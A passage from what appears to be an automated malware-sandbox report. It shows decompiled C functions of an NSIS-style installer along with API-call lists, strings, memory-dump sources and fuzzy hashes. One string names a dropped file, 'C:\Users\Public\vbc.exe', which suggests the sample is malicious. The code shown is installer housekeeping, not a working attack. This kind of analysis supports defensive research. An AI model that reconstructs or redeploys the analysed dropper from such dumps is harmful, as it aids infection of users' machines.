                              							goto L31;
                              						}
                              					}
                              					__eflags = _t52 - 0x5a04;
                              					if(_t52 == 0x5a04) {
                              						goto L13;
                              					}
                              					__eflags = _v16 - 0x23;
                              					if(_v16 == 0x23) {
                              						goto L13;
                              					}
                              					__eflags = _v16 - 0x2e;
                              					if(_v16 == 0x2e) {
                              						goto L13;
                              					} else {
                              						_a8 = _a8 & 0x00000000;
                              						goto L14;
                              					}
                              				}
                              				 *_t90 =  *_t90 & 0x00000000;
                              				if(_a4 == 0) {
                              					return _t39;
                              				}
                              				return E00406228(_a4, _t39);
                              			}




























                              APIs
                              • GetSystemDirectoryA.KERNEL32(uvlcopdlxoed,00000400), ref: 004063E6
                              • GetWindowsDirectoryA.KERNEL32(uvlcopdlxoed,00000400,?,00420530,00000000,00405387,00420530,00000000), ref: 004063F9
                              • SHGetSpecialFolderLocation.SHELL32(00405387,00000000,?), ref: 00406435
                              • SHGetPathFromIDListA.SHELL32(00000000,uvlcopdlxoed), ref: 00406443
                              • CoTaskMemFree.OLE32(00000000), ref: 0040644F
                              • lstrcatA.KERNEL32(uvlcopdlxoed,\Microsoft\Internet Explorer\Quick Launch), ref: 00406473
                              • lstrlenA.KERNEL32(uvlcopdlxoed,?,00420530,00000000,00405387,00420530,00000000,00000000,00000000,00000000), ref: 004064C5
                              Strings
                              Memory Dump Source
                              • Source File: 00000004.00000002.2162165102.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000004.00000002.2162154870.0000000000400000.00000002.00020000.sdmp
                              • Associated: 00000004.00000002.2162181596.0000000000408000.00000002.00020000.sdmp
                              • Associated: 00000004.00000002.2162200762.000000000040A000.00000004.00020000.sdmp
                              • Associated: 00000004.00000002.2162217509.0000000000413000.00000004.00020000.sdmp
                              • Associated: 00000004.00000002.2162228489.0000000000422000.00000004.00020000.sdmp
                              • Associated: 00000004.00000002.2162238122.000000000042A000.00000004.00020000.sdmp
                              • Associated: 00000004.00000002.2162252001.000000000042D000.00000002.00020000.sdmp
                              Similarity
                              • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskWindowslstrcatlstrlen
                              • String ID: Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch$uvlcopdlxoed
                              • API String ID: 717251189-2520582795
                              • Opcode ID: bc9471c6cf8ae6720703e8417b03b042a63b45d26e40513c79d31308c85558e4
                              • Instruction ID: f83f29d570338ae078c2f0a770e3e6ec7f31d765c13aaba4f9587f8cbfb2a84b
                              • Opcode Fuzzy Hash: bc9471c6cf8ae6720703e8417b03b042a63b45d26e40513c79d31308c85558e4
                              • Instruction Fuzzy Hash: 22610071A00214AEDF209F64D984BBA3BA4EB55714F12413FE913BA2D1C37C8962CB5E
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 100%
                              			E00406503(CHAR* _a4) {
                              				char _t5;
                              				char _t7;
                              				char* _t15;
                              				char* _t16;
                              				CHAR* _t17;
                              
                              				_t17 = _a4;
                              				if( *_t17 == 0x5c && _t17[1] == 0x5c && _t17[2] == 0x3f && _t17[3] == 0x5c) {
                              					_t17 =  &(_t17[4]);
                              				}
                              				if( *_t17 != 0 && E00405C2D(_t17) != 0) {
                              					_t17 =  &(_t17[2]);
                              				}
                              				_t5 =  *_t17;
                              				_t15 = _t17;
                              				_t16 = _t17;
                              				if(_t5 != 0) {
                              					do {
                              						if(_t5 > 0x1f &&  *((char*)(E00405BEB("*?|<>/\":", _t5))) == 0) {
                              							E00405D7C(_t16, _t17, CharNextA(_t17) - _t17);
                              							_t16 = CharNextA(_t16);
                              						}
                              						_t17 = CharNextA(_t17);
                              						_t5 =  *_t17;
                              					} while (_t5 != 0);
                              				}
                              				 *_t16 =  *_t16 & 0x00000000;
                              				while(1) {
                              					_t16 = CharPrevA(_t15, _t16);
                              					_t7 =  *_t16;
                              					if(_t7 != 0x20 && _t7 != 0x5c) {
                              						break;
                              					}
                              					 *_t16 =  *_t16 & 0x00000000;
                              					if(_t15 < _t16) {
                              						continue;
                              					}
                              					break;
                              				}
                              				return _t7;
                              			}









                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000004.00000002.2162165102.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000004.00000002.2162154870.0000000000400000.00000002.00020000.sdmp
                              • Associated: 00000004.00000002.2162181596.0000000000408000.00000002.00020000.sdmp
                              • Associated: 00000004.00000002.2162200762.000000000040A000.00000004.00020000.sdmp
                              • Associated: 00000004.00000002.2162217509.0000000000413000.00000004.00020000.sdmp
                              • Associated: 00000004.00000002.2162228489.0000000000422000.00000004.00020000.sdmp
                              • Associated: 00000004.00000002.2162238122.000000000042A000.00000004.00020000.sdmp
                              • Associated: 00000004.00000002.2162252001.000000000042D000.00000002.00020000.sdmp
                              Similarity
                              • API ID: Char$Next$Prev
                              • String ID: "C:\Users\Public\vbc.exe" $*?|<>/":$C:\Users\user\AppData\Local\Temp\
                              • API String ID: 589700163-1374994687
                              • Opcode ID: 6624216dd93989c3e415f19addad0263e6dff954d131d517deda7fd7c47402c7
                              • Instruction ID: ed4a40943fe5e2665a2a55f9ea129fd4e03433fedea2fb13391fe05f183277a3
                              • Opcode Fuzzy Hash: 6624216dd93989c3e415f19addad0263e6dff954d131d517deda7fd7c47402c7
                              • Instruction Fuzzy Hash: 5511E26180479139EB3216386C44B77BFD84B577A0F19007FE9C2722CAD67C5C62826D
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 100%
                              			E00404313(intOrPtr _a4, struct HDC__* _a8, struct HWND__* _a12) {
                              				struct tagLOGBRUSH _v16;
                              				long _t39;
                              				long _t41;
                              				void* _t44;
                              				signed char _t50;
                              				long* _t54;
                              
                              				if(_a4 + 0xfffffecd > 5) {
                              					L18:
                              					return 0;
                              				}
                              				_t54 = GetWindowLongA(_a12, 0xffffffeb);
                              				if(_t54 == 0 || _t54[2] > 1 || _t54[4] > 2) {
                              					goto L18;
                              				} else {
                              					_t50 = _t54[5];
                              					if((_t50 & 0xffffffe0) != 0) {
                              						goto L18;
                              					}
                              					_t39 =  *_t54;
                              					if((_t50 & 0x00000002) != 0) {
                              						_t39 = GetSysColor(_t39);
                              					}
                              					if((_t54[5] & 0x00000001) != 0) {
                              						SetTextColor(_a8, _t39);
                              					}
                              					SetBkMode(_a8, _t54[4]);
                              					_t41 = _t54[1];
                              					_v16.lbColor = _t41;
                              					if((_t54[5] & 0x00000008) != 0) {
                              						_t41 = GetSysColor(_t41);
                              						_v16.lbColor = _t41;
                              					}
                              					if((_t54[5] & 0x00000004) != 0) {
                              						SetBkColor(_a8, _t41);
                              					}
                              					if((_t54[5] & 0x00000010) != 0) {
                              						_v16.lbStyle = _t54[2];
                              						_t44 = _t54[3];
                              						if(_t44 != 0) {
                              							DeleteObject(_t44);
                              						}
                              						_t54[3] = CreateBrushIndirect( &_v16);
                              					}
                              					return _t54[3];
                              				}
                              			}










                              APIs
                              Memory Dump Source
                              • Source File: 00000004.00000002.2162165102.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000004.00000002.2162154870.0000000000400000.00000002.00020000.sdmp
                              • Associated: 00000004.00000002.2162181596.0000000000408000.00000002.00020000.sdmp
                              • Associated: 00000004.00000002.2162200762.000000000040A000.00000004.00020000.sdmp
                              • Associated: 00000004.00000002.2162217509.0000000000413000.00000004.00020000.sdmp
                              • Associated: 00000004.00000002.2162228489.0000000000422000.00000004.00020000.sdmp
                              • Associated: 00000004.00000002.2162238122.000000000042A000.00000004.00020000.sdmp
                              • Associated: 00000004.00000002.2162252001.000000000042D000.00000002.00020000.sdmp
                              Similarity
                              • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                              • String ID:
                              • API String ID: 2320649405-0
                              • Opcode ID: dc1d3e55db8ec23378b3830e5d111dcc895b5f12cd74b581ce4b7be4d8059b2f
                              • Instruction ID: 4ebf73092ad7484045a31fabae3cd442355fcbc25dfc518f848a7595e5b54366
                              • Opcode Fuzzy Hash: dc1d3e55db8ec23378b3830e5d111dcc895b5f12cd74b581ce4b7be4d8059b2f
                              • Instruction Fuzzy Hash: 592165716007049BCB309F68E948B5BBBF8AF41710B05892EED96E26E0D774E814CB54
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 100%
                              			E0040534F(CHAR* _a4, CHAR* _a8) {
                              				struct HWND__* _v8;
                              				signed int _v12;
                              				CHAR* _v32;
                              				long _v44;
                              				int _v48;
                              				void* _v52;
                              				void* __ebx;
                              				void* __edi;
                              				void* __esi;
                              				CHAR* _t26;
                              				signed int _t27;
                              				CHAR* _t28;
                              				long _t29;
                              				signed int _t39;
                              
                              				_t26 =  *0x423f24; // 0x0
                              				_v8 = _t26;
                              				if(_t26 != 0) {
                              					_t27 =  *0x424814;
                              					_v12 = _t27;
                              					_t39 = _t27 & 0x00000001;
                              					if(_t39 == 0) {
                              						E004062BB(0, _t39, 0x420530, 0x420530, _a4);
                              					}
                              					_t26 = lstrlenA(0x420530);
                              					_a4 = _t26;
                              					if(_a8 == 0) {
                              						L6:
                              						if((_v12 & 0x00000004) == 0) {
                              							_t26 = SetWindowTextA( *0x423f08, 0x420530);
                              						}
                              						if((_v12 & 0x00000002) == 0) {
                              							_v32 = 0x420530;
                              							_v52 = 1;
                              							_t29 = SendMessageA(_v8, 0x1004, 0, 0);
                              							_v44 = 0;
                              							_v48 = _t29 - _t39;
                              							SendMessageA(_v8, 0x1007 - _t39, 0,  &_v52);
                              							_t26 = SendMessageA(_v8, 0x1013, _v48, 0);
                              						}
                              						if(_t39 != 0) {
                              							_t28 = _a4;
                              							 *((char*)(_t28 + 0x420530)) = 0;
                              							return _t28;
                              						}
                              					} else {
                              						_t26 =  &(_a4[lstrlenA(_a8)]);
                              						if(_t26 < 0x800) {
                              							_t26 = lstrcatA(0x420530, _a8);
                              							goto L6;
                              						}
                              					}
                              				}
                              				return _t26;
                              			}


















                              APIs
                              • lstrlenA.KERNEL32(00420530,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402EC9,00000000,?), ref: 00405388
                              • lstrlenA.KERNEL32(00402EC9,00420530,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402EC9,00000000), ref: 00405398
                              • lstrcatA.KERNEL32(00420530,00402EC9,00402EC9,00420530,00000000,00000000,00000000), ref: 004053AB
                              • SetWindowTextA.USER32(00420530,00420530), ref: 004053BD
                              • SendMessageA.USER32 ref: 004053E3
                              • SendMessageA.USER32 ref: 004053FD
                              • SendMessageA.USER32 ref: 0040540B
                              Memory Dump Source
                              • Source File: 00000004.00000002.2162165102.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000004.00000002.2162154870.0000000000400000.00000002.00020000.sdmp
                              • Associated: 00000004.00000002.2162181596.0000000000408000.00000002.00020000.sdmp
                              • Associated: 00000004.00000002.2162200762.000000000040A000.00000004.00020000.sdmp
                              • Associated: 00000004.00000002.2162217509.0000000000413000.00000004.00020000.sdmp
                              • Associated: 00000004.00000002.2162228489.0000000000422000.00000004.00020000.sdmp
                              • Associated: 00000004.00000002.2162238122.000000000042A000.00000004.00020000.sdmp
                              • Associated: 00000004.00000002.2162252001.000000000042D000.00000002.00020000.sdmp
                              Similarity
                              • API ID: MessageSend$lstrlen$TextWindowlstrcat
                              • String ID:
                              • API String ID: 2531174081-0
                              • Opcode ID: 1758c99315444ffa8de3e4a805647494e46ff97573bb8ff712cd1a67f4e860c0
                              • Instruction ID: d7aab4fbb83e072b647ad5d9ecd44a72e262910ab30c50883f082c619406a612
                              • Opcode Fuzzy Hash: 1758c99315444ffa8de3e4a805647494e46ff97573bb8ff712cd1a67f4e860c0
                              • Instruction Fuzzy Hash: 54218171900118BBDB11AF95DD84ADEBFB9EF04354F14807AF944B6291C7788E918F98
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 100%
                              			E00402E52(intOrPtr _a4) {
                              				char _v68;
                              				long _t6;
                              				struct HWND__* _t7;
                              				struct HWND__* _t15;
                              
                              				if(_a4 != 0) {
                              					_t15 =  *0x41f904; // 0x0
                              					if(_t15 != 0) {
                              						_t15 = DestroyWindow(_t15);
                              					}
                              					 *0x41f904 = 0;
                              					return _t15;
                              				}
                              				__eflags =  *0x41f904; // 0x0
                              				if(__eflags != 0) {
                              					return E0040666D(0);
                              				}
                              				_t6 = GetTickCount();
                              				__eflags = _t6 -  *0x424750;
                              				if(_t6 >  *0x424750) {
                              					__eflags =  *0x424748;
                              					if( *0x424748 == 0) {
                              						_t7 = CreateDialogParamA( *0x424740, 0x6f, 0, E00402DBA, 0);
                              						 *0x41f904 = _t7;
                              						return ShowWindow(_t7, 5);
                              					}
                              					__eflags =  *0x424814 & 0x00000001;
                              					if(( *0x424814 & 0x00000001) != 0) {
                              						wsprintfA( &_v68, "... %d%%", E00402E36());
                              						return E0040534F(0,  &_v68);
                              					}
                              				}
                              				return _t6;
                              			}








                              APIs
                              • DestroyWindow.USER32 ref: 00402E6A
                              • GetTickCount.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0040306B), ref: 00402E88
                              • wsprintfA.USER32 ref: 00402EB6
                                • Part of subcall function 0040534F: lstrlenA.KERNEL32(00420530,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402EC9,00000000,?), ref: 00405388
                                • Part of subcall function 0040534F: lstrlenA.KERNEL32(00402EC9,00420530,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402EC9,00000000), ref: 00405398
                                • Part of subcall function 0040534F: lstrcatA.KERNEL32(00420530,00402EC9,00402EC9,00420530,00000000,00000000,00000000), ref: 004053AB
                                • Part of subcall function 0040534F: SetWindowTextA.USER32(00420530,00420530), ref: 004053BD
                                • Part of subcall function 0040534F: SendMessageA.USER32 ref: 004053E3
                                • Part of subcall function 0040534F: SendMessageA.USER32 ref: 004053FD
                                • Part of subcall function 0040534F: SendMessageA.USER32 ref: 0040540B
                              • CreateDialogParamA.USER32(0000006F,00000000,00402DBA,00000000), ref: 00402EDA
                              • ShowWindow.USER32(00000000,00000005), ref: 00402EE8
                                • Part of subcall function 00402E36: MulDiv.KERNEL32 ref: 00402E4B
                              Strings
                              Memory Dump Source
                              • Source File: 00000004.00000002.2162165102.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000004.00000002.2162154870.0000000000400000.00000002.00020000.sdmp
                              • Associated: 00000004.00000002.2162181596.0000000000408000.00000002.00020000.sdmp
                              • Associated: 00000004.00000002.2162200762.000000000040A000.00000004.00020000.sdmp
                              • Associated: 00000004.00000002.2162217509.0000000000413000.00000004.00020000.sdmp
                              • Associated: 00000004.00000002.2162228489.0000000000422000.00000004.00020000.sdmp
                              • Associated: 00000004.00000002.2162238122.000000000042A000.00000004.00020000.sdmp
                              • Associated: 00000004.00000002.2162252001.000000000042D000.00000002.00020000.sdmp
                              Similarity
                              • API ID: MessageSendWindow$lstrlen$CountCreateDestroyDialogParamShowTextTicklstrcatwsprintf
                              • String ID: ... %d%%
                              • API String ID: 722711167-2449383134
                              • Opcode ID: bb3bd4b2b9508e1df3cc882d5ccfee83ca66d66d4289bc98e9bfc3421e5f8959
                              • Instruction ID: 7a453c914e71352c87dd6fc4fa143b29ed4b83a6d55c3b122a6f25389f326a81
                              • Opcode Fuzzy Hash: bb3bd4b2b9508e1df3cc882d5ccfee83ca66d66d4289bc98e9bfc3421e5f8959
                              • Instruction Fuzzy Hash: 22018470582214E7CB61AB64EF0DAAF766CEB41745B14403BF801F21E0C7B95846CAEE
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 100%
                              			E00404BFF(struct HWND__* _a4, intOrPtr _a8) {
                              				long _v8;
                              				signed char _v12;
                              				unsigned int _v16;
                              				void* _v20;
                              				intOrPtr _v24;
                              				long _v56;
                              				void* _v60;
                              				long _t15;
                              				unsigned int _t19;
                              				signed int _t25;
                              				struct HWND__* _t28;
                              
                              				_t28 = _a4;
                              				_t15 = SendMessageA(_t28, 0x110a, 9, 0);
                              				if(_a8 == 0) {
                              					L4:
                              					_v56 = _t15;
                              					_v60 = 4;
                              					SendMessageA(_t28, 0x110c, 0,  &_v60);
                              					return _v24;
                              				}
                              				_t19 = GetMessagePos();
                              				_v16 = _t19 >> 0x10;
                              				_v20 = _t19;
                              				ScreenToClient(_t28,  &_v20);
                              				_t25 = SendMessageA(_t28, 0x1111, 0,  &_v20);
                              				if((_v12 & 0x00000066) != 0) {
                              					_t15 = _v8;
                              					goto L4;
                              				}
                              				return _t25 | 0xffffffff;
                              			}















                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000004.00000002.2162165102.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000004.00000002.2162154870.0000000000400000.00000002.00020000.sdmp
                              • Associated: 00000004.00000002.2162181596.0000000000408000.00000002.00020000.sdmp
                              • Associated: 00000004.00000002.2162200762.000000000040A000.00000004.00020000.sdmp
                              • Associated: 00000004.00000002.2162217509.0000000000413000.00000004.00020000.sdmp
                              • Associated: 00000004.00000002.2162228489.0000000000422000.00000004.00020000.sdmp
                              • Associated: 00000004.00000002.2162238122.000000000042A000.00000004.00020000.sdmp
                              • Associated: 00000004.00000002.2162252001.000000000042D000.00000002.00020000.sdmp
                              Similarity
                              • API ID: Message$Send$ClientScreen
                              • String ID: f
                              • API String ID: 41195575-1993550816
                              • Opcode ID: fae6ee4ef260730fd0e6baeb46c05ac4d0d99299cd6b7910a3b5b88b2e21feb9
                              • Instruction ID: 8affecd5b479f1171f5654815cc51d63bffccf6ae5a63c5c4c29235a80b14989
                              • Opcode Fuzzy Hash: fae6ee4ef260730fd0e6baeb46c05ac4d0d99299cd6b7910a3b5b88b2e21feb9
                              • Instruction Fuzzy Hash: 34015E71900219BBEB00DBA4DD85FFFBBBCAF55711F10012BBA50B61D0D7B4A9418BA4
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 100%
                              			E00402DBA(struct HWND__* _a4, intOrPtr _a8) {
                              				char _v68;
                              				void* _t11;
                              				CHAR* _t19;
                              
                              				if(_a8 == 0x110) {
                              					SetTimer(_a4, 1, 0xfa, 0);
                              					_a8 = 0x113;
                              				}
                              				if(_a8 == 0x113) {
                              					_t11 = E00402E36();
                              					_t19 = "unpacking data: %d%%";
                              					if( *0x424754 == 0) {
                              						_t19 = "verifying installer: %d%%";
                              					}
                              					wsprintfA( &_v68, _t19, _t11);
                              					SetWindowTextA(_a4,  &_v68);
                              					SetDlgItemTextA(_a4, 0x406,  &_v68);
                              				}
                              				return 0;
                              			}







                              APIs
                              • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402DD5
                              • wsprintfA.USER32 ref: 00402E09
                              • SetWindowTextA.USER32(?,?), ref: 00402E19
                              • SetDlgItemTextA.USER32(?,00000406,?), ref: 00402E2B
                              Strings
                              Memory Dump Source
                              • Source File: 00000004.00000002.2162165102.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000004.00000002.2162154870.0000000000400000.00000002.00020000.sdmp
                              • Associated: 00000004.00000002.2162181596.0000000000408000.00000002.00020000.sdmp
                              • Associated: 00000004.00000002.2162200762.000000000040A000.00000004.00020000.sdmp
                              • Associated: 00000004.00000002.2162217509.0000000000413000.00000004.00020000.sdmp
                              • Associated: 00000004.00000002.2162228489.0000000000422000.00000004.00020000.sdmp
                              • Associated: 00000004.00000002.2162238122.000000000042A000.00000004.00020000.sdmp
                              • Associated: 00000004.00000002.2162252001.000000000042D000.00000002.00020000.sdmp
                              Similarity
                              • API ID: Text$ItemTimerWindowwsprintf
                              • String ID: unpacking data: %d%%$verifying installer: %d%%
                              • API String ID: 1451636040-1158693248
                              • Opcode ID: 682236bfa9d44e469b32297ddf894a90f4f99da74b05dcaaf7480c0445501217
                              • Instruction ID: 5924424b8475f9adf48b5715c1e1f77af8692632bd00ddb5f136e7bd4fbbb8aa
                              • Opcode Fuzzy Hash: 682236bfa9d44e469b32297ddf894a90f4f99da74b05dcaaf7480c0445501217
                              • Instruction Fuzzy Hash: 36F01D7154020DFBEF20AF60DE0ABAE3769EB54345F00803AFA16B51D0DBB899558B99
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 93%
                              			E004027DF(void* __ebx, void* __eflags) {
                              				void* _t26;
                              				long _t31;
                              				void* _t45;
                              				void* _t49;
                              				void* _t51;
                              				void* _t54;
                              				void* _t55;
                              				void* _t56;
                              
                              				_t45 = __ebx;
                              				 *((intOrPtr*)(_t56 - 0xc)) = 0xfffffd66;
                              				_t50 = E00402BCE(0xfffffff0);
                              				 *(_t56 - 0x78) = _t23;
                              				if(E00405C2D(_t50) == 0) {
                              					E00402BCE(0xffffffed);
                              				}
                              				E00405D9C(_t50);
                              				_t26 = E00405DC1(_t50, 0x40000000, 2);
                              				 *(_t56 + 8) = _t26;
                              				if(_t26 != 0xffffffff) {
                              					_t31 =  *0x424758;
                              					 *(_t56 - 0x30) = _t31;
                              					_t49 = GlobalAlloc(0x40, _t31);
                              					if(_t49 != _t45) {
                              						E00403419(_t45);
                              						E00403403(_t49,  *(_t56 - 0x30));
                              						_t54 = GlobalAlloc(0x40,  *(_t56 - 0x20));
                              						 *(_t56 - 0x38) = _t54;
                              						if(_t54 != _t45) {
                              							E00403192(_t47,  *((intOrPtr*)(_t56 - 0x24)), _t45, _t54,  *(_t56 - 0x20));
                              							while( *_t54 != _t45) {
                              								_t47 =  *_t54;
                              								_t55 = _t54 + 8;
                              								 *(_t56 - 0x8c) =  *_t54;
                              								E00405D7C( *((intOrPtr*)(_t54 + 4)) + _t49, _t55, _t47);
                              								_t54 = _t55 +  *(_t56 - 0x8c);
                              							}
                              							GlobalFree( *(_t56 - 0x38));
                              						}
                              						E00405E68( *(_t56 + 8), _t49,  *(_t56 - 0x30));
                              						GlobalFree(_t49);
                              						 *((intOrPtr*)(_t56 - 0xc)) = E00403192(_t47, 0xffffffff,  *(_t56 + 8), _t45, _t45);
                              					}
                              					CloseHandle( *(_t56 + 8));
                              				}
                              				_t51 = 0xfffffff3;
                              				if( *((intOrPtr*)(_t56 - 0xc)) < _t45) {
                              					_t51 = 0xffffffef;
                              					DeleteFileA( *(_t56 - 0x78));
                              					 *((intOrPtr*)(_t56 - 4)) = 1;
                              				}
                              				_push(_t51);
                              				E00401423();
                              				 *0x4247e8 =  *0x4247e8 +  *((intOrPtr*)(_t56 - 4));
                              				return 0;
                              			}












                              APIs
                              • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 00402833
                              • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,000000F0), ref: 0040284F
                              • GlobalFree.KERNEL32(?), ref: 0040288E
                              • GlobalFree.KERNEL32(00000000), ref: 004028A1
                              • CloseHandle.KERNEL32(?), ref: 004028B9
                              • DeleteFileA.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 004028CD
                              Memory Dump Source
                              • Source File: 00000004.00000002.2162165102.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000004.00000002.2162154870.0000000000400000.00000002.00020000.sdmp
                              • Associated: 00000004.00000002.2162181596.0000000000408000.00000002.00020000.sdmp
                              • Associated: 00000004.00000002.2162200762.000000000040A000.00000004.00020000.sdmp
                              • Associated: 00000004.00000002.2162217509.0000000000413000.00000004.00020000.sdmp
                              • Associated: 00000004.00000002.2162228489.0000000000422000.00000004.00020000.sdmp
                              • Associated: 00000004.00000002.2162238122.000000000042A000.00000004.00020000.sdmp
                              • Associated: 00000004.00000002.2162252001.000000000042D000.00000002.00020000.sdmp
                              Similarity
                              • API ID: Global$AllocFree$CloseDeleteFileHandle
                              • String ID:
                              • API String ID: 2667972263-0
                              • Opcode ID: 9472795047facdfc58deb84b31b226fbb417f33134a7d8d5be020c0554978550
                              • Instruction ID: d0efecf462ec4b8749248d5ce184abccdfd1d8ac98bc27b14fb78a8abc9ee6f4
                              • Opcode Fuzzy Hash: 9472795047facdfc58deb84b31b226fbb417f33134a7d8d5be020c0554978550
                              • Instruction Fuzzy Hash: A5217C72800128BBDB216FA5CE48D9E7E79EF09364F10823EF461762E1C67949418BA8
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 77%
                              			E00404AF5(int _a4, intOrPtr _a8, signed int _a12, signed int _a16) {
                              				char _v36;
                              				char _v68;
                              				void* __ebx;
                              				void* __edi;
                              				void* __esi;
                              				signed int _t21;
                              				signed int _t22;
                              				void* _t29;
                              				void* _t31;
                              				void* _t32;
                              				void* _t41;
                              				signed int _t43;
                              				signed int _t47;
                              				signed int _t50;
                              				signed int _t51;
                              				signed int _t53;
                              
                              				_t21 = _a16;
                              				_t51 = _a12;
                              				_t41 = 0xffffffdc;
                              				if(_t21 == 0) {
                              					_push(0x14);
                              					_pop(0);
                              					_t22 = _t51;
                              					if(_t51 < 0x100000) {
                              						_push(0xa);
                              						_pop(0);
                              						_t41 = 0xffffffdd;
                              					}
                              					if(_t51 < 0x400) {
                              						_t41 = 0xffffffde;
                              					}
                              					if(_t51 < 0xffff3333) {
                              						_t50 = 0x14;
                              						asm("cdq");
                              						_t22 = 1 / _t50 + _t51;
                              					}
                              					_t23 = _t22 & 0x00ffffff;
                              					_t53 = _t22 >> 0;
                              					_t43 = 0xa;
                              					_t47 = ((_t22 & 0x00ffffff) + _t23 * 4 + (_t22 & 0x00ffffff) + _t23 * 4 >> 0) % _t43;
                              				} else {
                              					_t53 = (_t21 << 0x00000020 | _t51) >> 0x14;
                              					_t47 = 0;
                              				}
                              				_t29 = E004062BB(_t41, _t47, _t53,  &_v36, 0xffffffdf);
                              				_t31 = E004062BB(_t41, _t47, _t53,  &_v68, _t41);
                              				_t32 = E004062BB(_t41, _t47, 0x420d50, 0x420d50, _a8);
                              				wsprintfA(_t32 + lstrlenA(0x420d50), "%u.%u%s%s", _t53, _t47, _t31, _t29);
                              				return SetDlgItemTextA( *0x423f18, _a4, 0x420d50);
                              			}




















                              APIs
                              • lstrlenA.KERNEL32(00420D50,00420D50,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,00404A10,000000DF,00000000,00000400,?), ref: 00404B93
                              • wsprintfA.USER32 ref: 00404B9B
                              • SetDlgItemTextA.USER32(?,00420D50), ref: 00404BAE
                              Strings
                              Memory Dump Source
                              • Source File: 00000004.00000002.2162165102.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                              Similarity
                              • API ID: ItemTextlstrlenwsprintf
                              • String ID: %u.%u%s%s$PB
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 48%
                              			E00402CD0(void* __eflags, void* _a4, char* _a8, signed int _a12) {
                              				void* _v8;
                              				int _v12;
                              				char _v276;
                              				void* _t27;
                              				signed int _t33;
                              				intOrPtr* _t35;
                              				signed int _t45;
                              				signed int _t46;
                              				signed int _t47;
                              
                              				_t46 = _a12;
                              				_t47 = _t46 & 0x00000300;
                              				_t45 = _t46 & 0x00000001;
                              				_t27 = E004060AE(__eflags, _a4, _a8, _t47 | 0x00000009,  &_v8);
                              				if(_t27 == 0) {
                              					if((_a12 & 0x00000002) == 0) {
                              						L3:
                              						_push(0x105);
                              						_push( &_v276);
                              						_push(0);
                              						while(RegEnumKeyA(_v8, ??, ??, ??) == 0) {
                              							__eflags = _t45;
                              							if(__eflags != 0) {
                              								L10:
                              								RegCloseKey(_v8);
                              								return 0x3eb;
                              							}
                              							_t33 = E00402CD0(__eflags, _v8,  &_v276, _a12);
                              							__eflags = _t33;
                              							if(_t33 != 0) {
                              								break;
                              							}
                              							_push(0x105);
                              							_push( &_v276);
                              							_push(_t45);
                              						}
                              						RegCloseKey(_v8);
                              						_t35 = E00406631(3);
                              						if(_t35 != 0) {
                              							return  *_t35(_a4, _a8, _t47, 0);
                              						}
                              						return RegDeleteKeyA(_a4, _a8);
                              					}
                              					_v12 = 0;
                              					if(RegEnumValueA(_v8, 0,  &_v276,  &_v12, 0, 0, 0, 0) != 0x103) {
                              						goto L10;
                              					}
                              					goto L3;
                              				}
                              				return _t27;
                              			}













                              APIs
                              • RegEnumValueA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?,00100020,?,?,?), ref: 00402D24
                              • RegEnumKeyA.ADVAPI32(?,00000000,?,00000105), ref: 00402D70
                              • RegCloseKey.ADVAPI32(?,?,?), ref: 00402D79
                              • RegDeleteKeyA.ADVAPI32(?,?), ref: 00402D90
                              • RegCloseKey.ADVAPI32(?,?,?), ref: 00402D9B
                              Memory Dump Source
                              • Source File: 00000004.00000002.2162165102.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                              Similarity
                              • API ID: CloseEnum$DeleteValue
                              • String ID:
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 77%
                              			E00401D65(void* __ebx, void* __edx) {
                              				struct HWND__* _t30;
                              				CHAR* _t38;
                              				void* _t48;
                              				void* _t53;
                              				signed int _t55;
                              				signed int _t58;
                              				long _t61;
                              				void* _t65;
                              
                              				_t53 = __ebx;
                              				if(( *(_t65 - 0x1b) & 0x00000001) == 0) {
                              					_t30 = GetDlgItem( *(_t65 - 8),  *(_t65 - 0x20));
                              				} else {
                              					E00402BAC(2);
                              					 *((intOrPtr*)(__ebp - 0x38)) = __edx;
                              				}
                              				_t55 =  *(_t65 - 0x1c);
                              				 *(_t65 + 8) = _t30;
                              				_t58 = _t55 & 0x00000004;
